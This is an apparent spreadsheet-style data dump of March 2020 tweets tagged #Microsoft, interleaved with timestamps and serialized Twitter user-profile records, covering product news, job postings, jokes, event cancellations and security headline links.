    <t>{'id': 258771956, 'id_str': '258771956', 'name': 'Táµƒá¶¦Ê¸Ê¸á¶¦áµ‡ Aá¶»áµƒáµ ðŸ™ƒ', 'screen_name': 'taiyyib', 'location': 'Birmingham, England', 'description': 'ðŸ‡¹â„¢ðŸ›¡ Consultant | åŒšã„šä¹ƒä¹‡å°º ä¸‚ä¹‡cuå°ºï¾‰ï½²ï¾˜ SME | â“’â“¨â“‘â“”â“¡ â“–â“”â“”â“š | É†â‚®â±§Å‚â‚µâ‚³â±  â±§â‚³â‚µâ‚­Å‚â‚¦â‚² | ð“£ð“ªð“²ð”‚ð”‚ð“²ð“« ð“ð”ƒð“ªð“¶ |  Ø·ÙŠØ¨ ðŸ•µ ðŸ‡¬ðŸ‡§ðŸ´\U000e0067\U000e0062\U000e0065\U000e006e\U000e0067\U000e007f\nAll veiws are my own\n#EthicalHacking', 'url': 'https://t.co/eZOAQpdNhg', 'entities': {'url': {'urls': [{'url': 'https://t.co/eZOAQpdNhg', 'expanded_url': 'https://www.instagram.com/taiyyibazam/', 'display_url': 'instagram.com/taiyyibazam/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 396, 'friends_count': 878, 'listed_count': 146, 'created_at': 'Mon Feb 28 13:23:30 +0000 2011', 'favourites_count': 2886, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3752,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'http://pbs.twimg.com/profile_images/1228449242370510848/hLLxtxlw_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1228449242370510848/hLLxtxlw_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/258771956/1454627372',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</si>
  <si>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06:26:10 +0000 2020</t>
  </si>
  <si>
    <t>How #TheData #BoxFamily Can Help with Migrations #Migration https://t.co/uOgyCHU7Hi #Microsoft #Office #Office365</t>
  </si>
  <si>
    <t>Tue Mar 03 06:26:07 +0000 2020</t>
  </si>
  <si>
    <t>Release the beast, I love it!
https://t.co/r0QcisRKRA
#Broken Arrow
 #dreams #microsoft https://t.co/YmnyA8lep2</t>
  </si>
  <si>
    <t>{'id': 1232056148586647554, 'id_str': '1232056148586647554', 'name': 'Sharon6315', 'screen_name': 'Sharon63151', 'location': 'Ð›Ð¸Ð¿ÐµÑ†Ðº, Ð Ð¾ÑÑÐ¸Ñ', 'description': 'I realized I was thinking of you, and I began to wonder how long youâ€™d been on my mind. Then it occurred to me: Since I met you, youâ€™ve never left.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1, 'friends_count': 6, 'listed_count': 0, 'created_at': 'Mon Feb 24 21:34:54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'http://pbs.twimg.com/profile_images/1232066991596371969/eF6-wTG6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1232066991596371969/eF6-wTG6_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1232056148586647554/1582582821',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</si>
  <si>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06:25:35 +0000 2020</t>
  </si>
  <si>
    <t>#condenast bases its analysis of #programming trend on #microsoft analysts who only assess Microsoft data! Poor #journalism !! https://t.co/kK6OiiobNZ</t>
  </si>
  <si>
    <t>Tue Mar 03 06:25:31 +0000 2020</t>
  </si>
  <si>
    <t>According to a study by #Microsoft, the average #human being now has an attention span of eight seconds. This is a sharp decrease from the average attention span of 12 seconds in the year 2000.
#profseema #iimb #bangalore #digitalmarketing2020 #factsdaily #educateindia https://t.co/1uZuuUtKVR</t>
  </si>
  <si>
    <t>{'id': 1312706072, 'id_str': '1312706072', 'name': 'Seema Gupta', 'screen_name': 'seemaIIMB', 'location': 'Bangalore', 'description': 'Chairperson Post Graduate Program in Enterprises Management (PGPEM) &amp; Associate Professor Digital Marketing, IIM Bangalore.', 'url': 'https://t.co/dmCF3icEkZ', 'entities': {'url': {'urls': [{'url': 'https://t.co/dmCF3icEkZ', 'expanded_url': 'http://www.profseema.com/', 'display_url': 'profseema.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 840, 'friends_count': 115, 'listed_count': 12, 'created_at': 'Fri Mar 29 05:33:07 +0000 2013', 'favourites_count': 29, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 518,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'http://pbs.twimg.com/profile_images/1210444739872350208/ITJBjdao_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1210444739872350208/ITJBjdao_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1312706072/1576759506',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</si>
  <si>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Tue Mar 03 06:25:02 +0000 2020</t>
  </si>
  <si>
    <t>#FreeStuff #Microsoft Xbox Games With Gold: Batman, Shantae, Castlevania, Sonic Generations https://t.co/qR8X4fbNM1</t>
  </si>
  <si>
    <t>{'id': 782425094962438144, 'id_str': '782425094962438144', 'name': 'slickvic1993', 'screen_name': 'slickvic1993', 'location': '', 'description': 'Whatâ€™s up! Itâ€™s ya boy slickvic1993! Come support me on my YouTube channel [slickvic1993: https://t.co/r546OABjCl], and twitch too!', 'url': 'https://t.co/eYBM6WHXSf', 'entities': {'url': {'urls': [{'url': 'https://t.co/eYBM6WHXSf', 'expanded_url': 'http://www.youtube.com/c/Slickvic1993gamer', 'display_url': 'youtube.com/c/Slickvic1993â€¦', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/r546OABjCl', 'expanded_url': 'http://bit.ly/2LkCj3e', 'display_url': 'bit.ly/2LkCj3e', 'indices': [90, 113]}]}}, 'protected': False, 'followers_count': 304, 'friends_count': 7, 'listed_count': 0, 'created_at': 'Sun Oct 02 03:40:54 +0000 2016', 'favourites_count': 104, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1213,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'http://pbs.twimg.com/profile_images/1181759494604365826/aX_2tKn8_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1181759494604365826/aX_2tKn8_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/782425094962438144/1567841822',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</si>
  <si>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06:24:20 +0000 2020</t>
  </si>
  <si>
    <t>A New Hacking Wave!!  https://t.co/zbXGirFNiN #infosec #EthicalHacking #ITSecurity #ITSEC #CyberSecurity #hacking #ransonware #PatchTuesday #windows #Microsoft #android #StaySafeOnline #Taiyyib #ransonware #malware #SecurityIntelligence #ANewWave</t>
  </si>
  <si>
    <t>Tue Mar 03 06:18:30 +0000 2020</t>
  </si>
  <si>
    <t>The $5 hack!!  https://t.co/7SPF38axTr #infosec #EthicalHacking #ITSecurity #ITSEC #CyberSecurity #hacking #ransonware #PatchTuesday #windows #Microsoft #android #StaySafeOnline #Taiyyib #ransonware #malware #SecurityIntelligence</t>
  </si>
  <si>
    <t>Tue Mar 03 06:16:46 +0000 2020</t>
  </si>
  <si>
    <t>When #Hackers met #SapceX /  #Tesla https://t.co/36TRPpnQj8 #infosec #EthicalHacking #ITSecurity #ITSEC #CyberSecurity #hacking #ransonware #PatchTuesday #windows #Microsoft #android #StaySafeOnline #Taiyyib #ransonware #malware #SecurityIntelligence</t>
  </si>
  <si>
    <t>Tue Mar 03 06:15:44 +0000 2020</t>
  </si>
  <si>
    <t>Wake up everybody! #Microsoft Ignite The Tour #Amsterdam is cancelled! #MicrosoftIgniteTheTourAmsterdam https://t.co/RISI9df6BT</t>
  </si>
  <si>
    <t>Tue Mar 03 06:15:38 +0000 2020</t>
  </si>
  <si>
    <t>The Ultimate Guide To Azure DevOps Server
#azure #DevOps #cloud #microsoft #devopsengineer #linux #aws #devopstraining
https://t.co/6YCozYhkLa</t>
  </si>
  <si>
    <t>{'id': 1208242792071172097, 'id_str': '1208242792071172097', 'name': 'bharathi', 'screen_name': 'bharathicynixit', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 15, 'friends_count': 70, 'listed_count': 1, 'created_at': 'Sat Dec 21 04:28:50 +0000 2019', 'favourites_count': 6, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 272, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1213417081321840642/mgWMfWVE_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1213417081321840642/mgWMfWVE_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1208242792071172097/1578136152',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</si>
  <si>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06:07:23 +0000 2020</t>
  </si>
  <si>
    <t>Stay Connected with Forexwhizz #forexsignals #cryptocurrency #forexlifestyle #investment #entrepreneur #crypto #business #investor #fx #UnitedStates #Banks #forecast #forexwhizz #microsoft https://t.co/lR4riYDR61</t>
  </si>
  <si>
    <t>{'id': 1200691527640465410, 'id_str': '1200691527640465410', 'name': 'forexwhizz', 'screen_name': 'forexwhizz1', 'location': 'UAE', 'description': 'Forex Whizz is started with a vision to provide Forex market consultancy services to help individual and corporate around the world.', 'url': 'https://t.co/bDxQXeeL9X', 'entities': {'url': {'urls': [{'url': 'https://t.co/bDxQXeeL9X', 'expanded_url': 'https://forexwhizz.com/', 'display_url': 'forexwhizz.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 23, 'friends_count': 32, 'listed_count': 0, 'created_at': 'Sat Nov 30 08:22:40 +0000 2019', 'favourites_count': 101, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 280, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1200691756649472000/5sk3vsvG_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1200691756649472000/5sk3vsvG_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1200691527640465410/1575102504',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</si>
  <si>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06:07:09 +0000 2020</t>
  </si>
  <si>
    <t>Kinda wanna buy Microsoft Flight Simulator and see if I can even get the plane off the ground #Microsoft #MicrosoftFlightSimulator</t>
  </si>
  <si>
    <t>{'id': 369313395, 'id_str': '369313395', 'name': 'Jam Slam', 'screen_name': 'JamSlam13', 'location': '', 'description': 'Letâ€™s start over! Subscribe to my YouTube for upcoming awesomeness!', 'url': 'https://t.co/8NMKXqv4eH', 'entities': {'url': {'urls': [{'url': 'https://t.co/8NMKXqv4eH', 'expanded_url': 'http://youtube.com/jamslam13', 'display_url': 'youtube.com/jamslam13', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 238, 'friends_count': 156, 'listed_count': 1, 'created_at': 'Wed Sep 07 04:15:23 +0000 2011', 'favourites_count': 379, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5491,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'http://pbs.twimg.com/profile_images/1228927577122717697/m1Cmh5ft_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1228927577122717697/m1Cmh5ft_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/369313395/1543778843', 'profile_link_color': '000000', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': '252429', 'profile_text_color': '666666', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 06:06:45 +0000 2020</t>
  </si>
  <si>
    <t>New #Windows10 update: #Microsoft tries again to fix search bugs. 
https://t.co/bSpEwQVqlF via @ZDNet &amp;amp; @LiamT</t>
  </si>
  <si>
    <t>{'id': 2922760149, 'id_str': '2922760149', 'name': 'Hexnode', 'screen_name': 'thehexnode', 'location': 'San Francisco, CA', 'description': 'Unified Mobile and Desktop Management  #UEM #MDM  #EMM #applemdm #androidmdm #windowsmdm #macmdm #appletvmdm #fireosmdm', 'url': 'https://t.co/d14VItcgrL', 'entities': {'url': {'urls': [{'url': 'https://t.co/d14VItcgrL', 'expanded_url': 'https://www.hexnode.com/mobile-device-management/', 'display_url': 'hexnode.com/mobile-device-â€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4100, 'friends_count': 724, 'listed_count': 36, 'created_at': 'Mon Dec 15 12:20:57 +0000 2014', 'favourites_count': 181, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1087,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'http://pbs.twimg.com/profile_images/961945845926051841/803d1n_O_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/961945845926051841/803d1n_O_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2922760149/1581588599',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</si>
  <si>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06:05:56 +0000 2020</t>
  </si>
  <si>
    <t>Keeping all employees connected to company data can be tough, especially for an airline like Qantas -- but not when its data is stored on the #cloud and accessed using familiar #Microsoft tools. https://t.co/NldNAuwIc6</t>
  </si>
  <si>
    <t>{'id': 3232904874, 'id_str': '3232904874', 'name': 'Wild Mouse', 'screen_name': 'WildMouseAus', 'location': 'Melbourne, Victoria', 'description': 'We are wild about our mission to demystify technology, and passionate about building customer advocacy by delivering game changing capabilities.', 'url': 'https://t.co/4OTYUyw1G6', 'entities': {'url': {'urls': [{'url': 'https://t.co/4OTYUyw1G6', 'expanded_url': 'http://www.wildmouse.com', 'display_url': 'wildmouse.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 76, 'friends_count': 163, 'listed_count': 21, 'created_at': 'Mon Jun 01 22:42:43 +0000 2015', 'favourites_count': 62, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 424,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'http://pbs.twimg.com/profile_images/863009244538327040/9Vki3rhF_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/863009244538327040/9Vki3rhF_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3232904874/1494566826',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</si>
  <si>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06:04:01 +0000 2020</t>
  </si>
  <si>
    <t>DON'T MISS the #Dubai stop of the HPE &amp;amp; #Microsoft #HybridCloud Roadshow on 11th March. More info here: https://t.co/z80k13wobk
#HPEalliances #UAE #DubaiDigital #UAEtech #HybridIT https://t.co/AIFWJQP1Er</t>
  </si>
  <si>
    <t>Tue Mar 03 06:03:37 +0000 2020</t>
  </si>
  <si>
    <t>Do you want to make your presentations more accessible? 
Make it easier for your audience to follow your presentation with Live Subtitles!!! 
Check out this video guide on how to set it up!  https://t.co/WDuyvxXy9X
#Microsoft #MicrosoftEDU #PowerPoint #TeachMe https://t.co/TVcIX4VtOh</t>
  </si>
  <si>
    <t>{'id': 1228695911326474240, 'id_str': '1228695911326474240', 'name': 'TeachMe', 'screen_name': 'TeachMe_UK', 'location': '', 'description': 'The Official Twitter account for TeachMe YouTube channel - To inspire and empower teachers &amp; students on methods to optimise teaching &amp; learning. #MicrosoftEDU', 'url': 'https://t.co/Hhh5SXcgGQ', 'entities': {'url': {'urls': [{'url': 'https://t.co/Hhh5SXcgGQ', 'expanded_url': 'https://www.youtube.com/channel/UCUfRSps9rj7-i4xB7U-8zDQ?sub_confirmation=1', 'display_url': 'youtube.com/channel/UCUfRSâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 112, 'friends_count': 409, 'listed_count': 0, 'created_at': 'Sat Feb 15 15:02:11 +0000 2020', 'favourites_count': 22,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'http://pbs.twimg.com/profile_images/1231574881969614848/8D-aBgPi_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1231574881969614848/8D-aBgPi_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1228695911326474240/1582462100',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</si>
  <si>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06:01:18 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft and #Apple Leftovers
 https://t.co/z2DJvZYZXJ #proprietarysoftware</t>
  </si>
  <si>
    <t>Tue Mar 03 06:00:09 +0000 2020</t>
  </si>
  <si>
    <t>The #Cloud Market Keeps Moving Upwards, #infograph by @StatistaCharts 
#cloudcomputing, #publiccloud, #aws, #microsoft, #azure https://t.co/XyEla3vtOv</t>
  </si>
  <si>
    <t>Tue Mar 03 06:00:03 +0000 2020</t>
  </si>
  <si>
    <t>"The success of the food revolution will depend on data." #Microsoft #AI https://t.co/D2mbrt5Eus</t>
  </si>
  <si>
    <t>{'id': 3197513729, 'id_str': '3197513729', 'name': 'Michaela Wirz', 'screen_name': 'WirzMichaela', 'location': 'ZÃ¼rich, Schweiz', 'description': 'Senior Marketing Manager EMEA Central  @Dynatrace', 'url': 'https://t.co/s7ykiZBHqk', 'entities': {'url': {'urls': [{'url': 'https://t.co/s7ykiZBHqk', 'expanded_url': 'http://www.dynatrace.com', 'display_url': 'dynatrace.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 478, 'friends_count': 159, 'listed_count': 17, 'created_at': 'Thu Apr 23 10:35:10 +0000 2015', 'favourites_count': 610, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 994,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'http://pbs.twimg.com/profile_images/1218159200691544064/UCnESJXV_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1218159200691544064/UCnESJXV_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3197513729/1570605389',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</si>
  <si>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06:00:00 +0000 2020</t>
  </si>
  <si>
    <t>To whoever stole my copy of #Microsoft #Office, I will find you. You have my #Word. 
#pun #punoftheday</t>
  </si>
  <si>
    <t>{'id': 1188202018684506117, 'id_str': '1188202018684506117', 'name': 'PunOfTheDay - Jasmadis', 'screen_name': 'PunOfJasmadis', 'location': 'Switzerland', 'description': 'A pun a day keeps the doctor away.', 'url': 'https://t.co/9UqB7H8Fy4', 'entities': {'url': {'urls': [{'url': 'https://t.co/9UqB7H8Fy4', 'expanded_url': 'http://www.jasmadis.ch', 'display_url': 'jasmadis.ch', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 17, 'friends_count': 67, 'listed_count': 0, 'created_at': 'Sat Oct 26 21:13:43 +0000 2019', 'favourites_count': 15, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 112, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1189262523113136128/OZ0qsIv6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1189262523113136128/OZ0qsIv6_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1188202018684506117/1572384911',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</si>
  <si>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05:53:02 +0000 2020</t>
  </si>
  <si>
    <t>#WeAreHiring for the profile of #NavisionFunctional in #Bangalore. Be a part of our growing #JKTechnosoft family. Share your updated resume at thara.dharmadi@jktech.com.
https://t.co/WYIDOymrer
#HiringAlert #Hiring #JobOpening #Navision #MicrosoftDynamics #Microsoft #Jobs https://t.co/WV4z2rlh3J</t>
  </si>
  <si>
    <t>{'id': 2831592169, 'id_str': '2831592169', 'name': 'JK Technosoft', 'screen_name': 'JKTechnosoft', 'location': 'India', 'description': 'JKT is a global software services and solutions company enabling clients to deliver sustainable success by providing value-driven services &amp; solutions.', 'url': 'https://t.co/TA6FZtbkvE', 'entities': {'url': {'urls': [{'url': 'https://t.co/TA6FZtbkvE', 'expanded_url': 'https://jktech.com/', 'display_url': 'jktech.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 287, 'friends_count': 311, 'listed_count': 12, 'created_at': 'Thu Sep 25 10:11:13 +0000 2014', 'favourites_count': 331, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 789,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'http://pbs.twimg.com/profile_images/1011870881906225152/W3H0bKQh_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1011870881906225152/W3H0bKQh_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2831592169/1582798862',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</si>
  <si>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05:52:13 +0000 2020</t>
  </si>
  <si>
    <t>Did you know  that 77% of users on Twitter feel more positive about a brand when they get a reply back from it?
#twitter #socialaspectmarketing
#socialaspecttuesday #socialaspect1 #digitalillustration #photoshop #adobeillustrator #microsoft #likeforfollow #socialmediaexpert https://t.co/6kvTYxOzgr</t>
  </si>
  <si>
    <t>{'id': 1005172647863422977, 'id_str': '1005172647863422977', 'name': 'Tanha shah', 'screen_name': 'Tanhashah1410', 'location': 'Ahmadabad City, India', 'description': 'Advertising Campaign Executive - Fibre2Fashion\nSocial Media MarketerðŸ“Š', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 25, 'friends_count': 178, 'listed_count': 0, 'created_at': 'Fri Jun 08 19:40:09 +0000 2018', 'favourites_count': 46, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 28, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1005317912289337344/q4YbEw5j_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1005317912289337344/q4YbEw5j_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1005172647863422977/1557682628',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</si>
  <si>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05:51:44 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft using AR to help vision impaired people see https://t.co/sz9J19BgLz #Hololens #AR #Microsoft</t>
  </si>
  <si>
    <t>{'id': 1215176108766707712, 'id_str': '1215176108766707712', 'name': 'AltFuse', 'screen_name': 'AltFuse7', 'location': 'India', 'description': 'Predict Past Remember Future!\nSpace for current and future trends, forecasts, innovation and stories that have the potential to transform our society.', 'url': 'https://t.co/d1wIhDAAGB', 'entities': {'url': {'urls': [{'url': 'https://t.co/d1wIhDAAGB', 'expanded_url': 'http://www.alt-fuse.com', 'display_url': 'alt-fuse.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1, 'friends_count': 48, 'listed_count': 0, 'created_at': 'Thu Jan 09 07:39:06 +0000 2020', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 30, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1218157932191178762/ESxLlT2H_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1218157932191178762/ESxLlT2H_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1215176108766707712/1579266461',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</si>
  <si>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05:51:10 +0000 2020</t>
  </si>
  <si>
    <t>This won't help as long as there are many deliberate backdoors abound  https://t.co/8lnGxrgp75  e.g. in everything from #microsoft  https://t.co/fug0FsaCh0</t>
  </si>
  <si>
    <t>Tue Mar 03 05:50:38 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Office 2016 Professional Plus Key license Genuine  Instant Delivery #2016 #Delivery #Genuine #Instant #License #Microsoft #office #Plus #professional # https://t.co/dNAUl6mjPO</t>
  </si>
  <si>
    <t>Tue Mar 03 05:50:15 +0000 2020</t>
  </si>
  <si>
    <t>Brand new Microsoft Windows 8.1 Pro Full Version 64 bit DVD with Product Key 8  #Brand #Full #Microsoft #Product #Version #Windows https://t.co/G9zXYCRHuH</t>
  </si>
  <si>
    <t>Tue Mar 03 05:47:26 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft you denied a Higgs Boson Startup Hope you can live with yourself #Microsoft and the Royal Society.</t>
  </si>
  <si>
    <t>{'id': 40799920, 'id_str': '40799920', 'name': 'Jonathan Moore', 'screen_name': 'jdm7dv', 'location': 'United States', 'description': '.NET Foundation MIT Open Courseware Adobe CLA Reason Studios, IRCAM, National Association for Gifted Children, UVa Alumni, Royal Society of the Arts Fellow.', 'url': 'https://t.co/vcGrpaXK7c', 'entities': {'url': {'urls': [{'url': 'https://t.co/vcGrpaXK7c', 'expanded_url': 'https://www.jonathanmoore.net', 'display_url': 'jonathanmoore.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3132, 'friends_count': 1666, 'listed_count': 62, 'created_at': 'Mon May 18 03:03:04 +0000 2009', 'favourites_count': 6, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 77308, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '000000', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme17/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme17/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1231700611789443072/V8oBR3g-_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1231700611789443072/V8oBR3g-_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/40799920/1582637301',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</si>
  <si>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05:43:19 +0000 2020</t>
  </si>
  <si>
    <t>#OpenBLAS needs to #deletegithub
#proprietarysoftware trap of #microsoft isn't suitable a platform for #freesw
https://t.co/hHuvhytnbt</t>
  </si>
  <si>
    <t>Tue Mar 03 05:42:34 +0000 2020</t>
  </si>
  <si>
    <t>Tue Mar 03 05:35:54 +0000 2020</t>
  </si>
  <si>
    <t>@Azure tip of the day:
#Microsoft #MicrosoftAzure #Azure #PaaS #linkedinlearning
https://t.co/iLOvxHmlMO</t>
  </si>
  <si>
    <t>Tue Mar 03 05:34:44 +0000 2020</t>
  </si>
  <si>
    <t>Sad but wise that the #Microsoft #MvpSummit 2020 is cancelled due to #COVID19
https://t.co/kP12geHbe8 https://t.co/5s5cV7qWPw</t>
  </si>
  <si>
    <t>{'id': 171446058, 'id_str': '171446058', 'name': 'Sunny Sharma (MVP | MCT | MCSE)', 'screen_name': 'ProSunnySharma', 'location': 'New Delhi, India', 'description': '.NET Developer. JS Lover. Speaker. Trainer. Tech Lead at https://t.co/NLwseLfCrJ . Chess is my favorite fun time. Tweets are my own.', 'url': 'https://t.co/HrgRlIXYkX', 'entities': {'url': {'urls': [{'url': 'https://t.co/HrgRlIXYkX', 'expanded_url': 'https://devsdaily.com', 'display_url': 'devsdaily.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/NLwseLfCrJ', 'expanded_url': 'http://kovai.co', 'display_url': 'kovai.co', 'indices': [57, 80]}]}}, 'protected': False, 'followers_count': 1294, 'friends_count': 804, 'listed_count': 75, 'created_at': 'Tue Jul 27 10:51:19 +0000 2010', 'favourites_count': 2961, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2977,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'http://pbs.twimg.com/profile_images/1024725043631206400/ZpbnUqJi_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1024725043631206400/ZpbnUqJi_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/171446058/1533148426',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</si>
  <si>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05:29:42 +0000 2020</t>
  </si>
  <si>
    <t>Udemy Free Discount - Data Science 2020 : Complete Data Science &amp;amp; Machine Learning #udemycoupon -&amp;gt; https://t.co/oZXb5fQKlS
#DataScience #MachineLearning #Python #DataAnalysis #DeepLearning #SQL #ArtificialIntelligence #Microsoft #PowerBI #Tableau #BigData #hadoop #100DaysOfCode</t>
  </si>
  <si>
    <t>Tue Mar 03 05:29:20 +0000 2020</t>
  </si>
  <si>
    <t>Due to massive PR offensives it's far too easy to fall for the trap or  the delusion that #microsoft "has changed"
Well, it did
But not in the necessary, meaningful way https://t.co/aoHkydKtMT</t>
  </si>
  <si>
    <t>Tue Mar 03 05:25:16 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft turning "Linux" into #Microsoft #surveillance tool https://t.co/6S1drGxkYg</t>
  </si>
  <si>
    <t>Tue Mar 03 05:17:19 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/VZUpKvkRD2
Personalized View - Hide &amp;amp; Show Videos
https://t.co/75eu9KPNhk
https://t.co/U45RO5Je8g
https://t.co/6WgJC8gbAm
#iamintel #intel #windows10 #microsoft #android #mobile #ios #iphone #ipad #tablet #cnxplayer #app #hdr #10bit #4k #fullhd #uhd #ultrahd https://t.co/IdxTVN6FRc</t>
  </si>
  <si>
    <t>Tue Mar 03 05:11:23 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Soundscape now works on #Bose Frames audio wearable https://t.co/IGyzctPjIG</t>
  </si>
  <si>
    <t>Tue Mar 03 05:08:03 +0000 2020</t>
  </si>
  <si>
    <t>I'll be sharing the efforts to support dual screens and foldable devices one the web. If you're around #pdx come join us at the @gdg PDX. #intel #Microsoft #samsung https://t.co/bpdoDcLn5k</t>
  </si>
  <si>
